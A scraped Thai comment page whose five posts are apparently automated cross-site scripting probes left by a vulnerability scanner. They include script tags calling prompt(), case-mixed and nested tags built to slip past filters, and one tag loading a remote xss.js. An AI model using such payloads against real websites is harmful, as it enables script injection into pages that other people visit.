1. ข้อความ : 1<script>prompt(955682)</script>
โดย : cexbwhit ( 07 มกราคม 2560 13:41:21 )

1. ข้อความ : 1<ScR<ScRiPt>IpT>prompt(982672)</sCr<ScRiPt>IpT>
โดย : cexbwhit ( 07 มกราคม 2560 13:41:21 )

1. ข้อความ : 1<ScRiPt >prompt(937083)</ScRiPt>
โดย : cexbwhit ( 07 มกราคม 2560 13:41:21 )

1. ข้อความ : 1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?930183></ScRiPt>
โดย : cexbwhit ( 07 มกราคม 2560 13:41:21 )

1. ข้อความ : 1<ScRiPt >prompt(944709)</ScRiPt>
โดย : cexbwhit ( 07 มกราคม 2560 13:41:21 )

ร่วมแสดงความคิดเห็น
ความคิดเห็น :  **
โดย :  **
E-mail :
รหัสยืนยัน :